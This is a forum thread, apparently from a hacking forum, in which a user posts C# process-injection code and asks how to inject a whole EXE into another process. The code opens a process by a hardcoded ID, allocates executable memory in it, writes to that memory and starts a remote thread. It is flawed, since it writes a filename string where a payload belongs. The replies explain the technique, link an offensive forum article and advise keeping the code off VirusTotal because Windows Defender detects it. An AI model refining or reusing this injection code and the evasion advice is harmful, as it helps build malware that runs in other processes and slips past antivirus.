Pe Injection

[Ghostmela]

Hello everyone i am trying to understand how pe injection works... The below code works fine if i used a shellcode as the payload, but when i use an exe file it doesn't work. I have an idea of converting the payload to base64 then see if i can load it but i haven,'t tried yet. I will we be happy if someone put me through on this or help me moderate the code to achieve what i want. Thanks in advance.


using System;
using System.Runtime.InteropServices;

namespace PE_Inject
{
class Program
{
[DllImport ("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr OpenProcess (uint processAccess, bool bInheritHandle, int processId);

[DllImport ("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx (IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport ("kernel32.dll")]
static extern bool WriteProcessMemory (IntPtr hProcess, IntPtr lpBaseAddress, string lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);

[DllImport ("kernel32.dll")]
static extern IntPtr CreateRemoteThread (IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[STAThread]
static void Main (string [] args)
{
IntPtr hProcess = OpenProcess (0x001F0FFF, false, 4804);
IntPtr addr = VirtualAllocEx (hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);

string file = "HelloWorld.exe"; // payload
IntPtr outSize;

WriteProcessMemory (hProcess, addr, file, file.Length, out outSize);

IntPtr hThread = CreateRemoteThread (hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);

}
}
}

 

[phant0m]

In short, you are executing your code in memory of other process. You have to allocate memory, write your shellcode and execute it.
You should learn about PE format first and how its mapped in memory. Then you can start playing with memory manipulation and other things.

 

[Ghostmela]

In short, you are executing your code in memory of other process. You have to allocate memory, write your shellcode and execute it.
You should learn about PE format first and how its mapped in memory. Then you can start playing with memory manipulation and other things.

Thank you. I really need to spend time on this. If you have a link or an article to read to understand this better on c# will also be great

 

[DildoFagins]

https://xss.pro/threads/42999/ - this article was good as far as I remember, you can use google to translate it to english or your native language.

 

[words_are_myth]

Alright I don't know I have seen this exact same code somewhere and its fully detected by windows Defender ..Anyways I will really encourage you to write your own code and remember don't use virus total

 

[Ghostmela]

Alright I don't know I have seen this exact same code somewhere and its fully detected by windows Defender ..Anyways I will really encourage you to write your own code and remember don't use virus total

Yeah you’re right. Got it from offensive service pen 300 course.